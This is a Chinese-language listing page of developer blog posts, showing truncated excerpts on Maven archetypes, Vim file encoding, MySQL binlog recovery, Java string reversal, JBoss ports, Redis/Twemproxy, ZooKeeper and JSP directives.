  • maven-3.3.3 mvn archetype 列表 crabdave ArcheType
    maven-3.3.3 mvn archetype 列表 可以参考最新的:http://repo1.maven.org/maven2/archetype-catalog.xml   [INFO] Scanning for projects... [INFO]                
  • linux shell 中文件编码查看及转换方法 daizj shell中文乱码vim文件编码
    一、查看文件编码。     在打开文件的时候输入:set fileencoding     即可显示文件编码格式。 二、文件编码转换     1、在Vim中直接进行转换文件编码,比如将一个文件转换成utf-8格式       &
  • MySQL--binlog日志恢复数据 dcj3sjt126com binlog
    恢复数据的重要命令如下 mysql> flush logs; 默认的日志是mysql-bin.000001,现在刷新了重新开启一个就多了一个mysql-bin.000002                  
  • 数据库中数据表数据迁移方法 dcj3sjt126com sql
    刚开始想想好像挺麻烦的,后来找到一种方法了,就SQL中的 INSERT 语句,不过内容是现从另外的表中查出来的,其实就是 MySQL中INSERT INTO SELECT的使用   下面看看如何使用   语法:MySQL中INSERT INTO SELECT的使用 1. 语法介绍       有三张表a、b、c,现在需要从表b
  • Java反转字符串 dyy_gusi java反转字符串
           前几天看见一篇文章,说使用Java能用几种方式反转一个字符串。首先要明白什么叫反转字符串,就是将一个字符串到过来啦,比如"倒过来念的是小狗"反转过来就是”狗小是的念来过倒“。接下来就把自己能想到的所有方式记录下来了。 1、第一个念头就是直接使用String类的反转方法,对不起,这样是不行的,因为Stri
  • UI设计中我们为什么需要设计动效 gcq511120594 UIlinux
    随着国际大品牌苹果和谷歌的引领,最近越来越多的国内公司开始关注动效设计了,越来越多的团队已经意识到动效在产品用户体验中的重要性了,更多的UI设计师们也开始投身动效设计领域。 但是说到底,我们到底为什么需要动效设计?或者说我们到底需要什么样的动效?做动效设计也有段时间了,于是尝试用一些案例,从产品本身出发来说说我所思考的动效设计。 一、加强体验舒适度 嗯,就是让用户更加爽更加爽的用
  • JBOSS服务部署端口冲突问题 HogwartsRow java应用服务器jbossserverEJB3
    服务端口冲突问题的解决方法,一般修改如下三个文件中的部分端口就可以了。   1、jboss5/server/default/conf/bindingservice.beans/META-INF/bindings-jboss-beans.xml   2、./server/default/deploy/jbossweb.sar/server.xml   3、.
  • 第三章 Redis/SSDB+Twemproxy安装与使用 jinnianshilongnian ssdbreidstwemproxy
    目前对于互联网公司不使用Redis的很少,Redis不仅仅可以作为key-value缓存,而且提供了丰富的数据结果如set、list、map等,可以实现很多复杂的功能;但是Redis本身主要用作内存缓存,不适合做持久化存储,因此目前有如SSDB、ARDB等,还有如京东的JIMDB,它们都支持Redis协议,可以支持Redis客户端直接访问;而这些持久化存储大多数使用了如LevelDB、RocksD
  • ZooKeeper原理及使用 liyonghui160com
               ZooKeeper是Hadoop Ecosystem中非常重要的组件,它的主要功能是为分布式系统提供一致性协调(Coordination)服务,与之对应的Google的类似服务叫Chubby。今天这篇文章分为三个部分来介绍ZooKeeper,第一部分介绍ZooKeeper的基本原理,第二部分介绍ZooKeeper
  • 程序员解决问题的60个策略 pda158 框架工作单元测试
    根本的指导方针 1. 首先写代码的时候最好不要有缺陷。最好的修复方法就是让 bug 胎死腹中。 良好的单元测试 强制数据库约束 使用输入验证框架 避免未实现的“else”条件 在应用到主程序之前知道如何在孤立的情况下使用   日志 2. print 语句。往往额外输出个一两行将有助于隔离问题。 3. 切换至详细的日志记录。详细的日
  • Create the Google Play Account sillycat Google
    Create the Google Play Account Having a Google account, pay 25$, then you get your google developer account. References: http://developer.android.com/distribute/googleplay/start.html https://p
  • JSP三大指令 vikingwei jsp
    JSP三大指令   一个jsp页面中,可以有0~N个指令的定义! 1. page --> 最复杂:<%@page language="java" info="xxx"...%>   * pageEncoding和contentType:     > pageEncoding:它
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他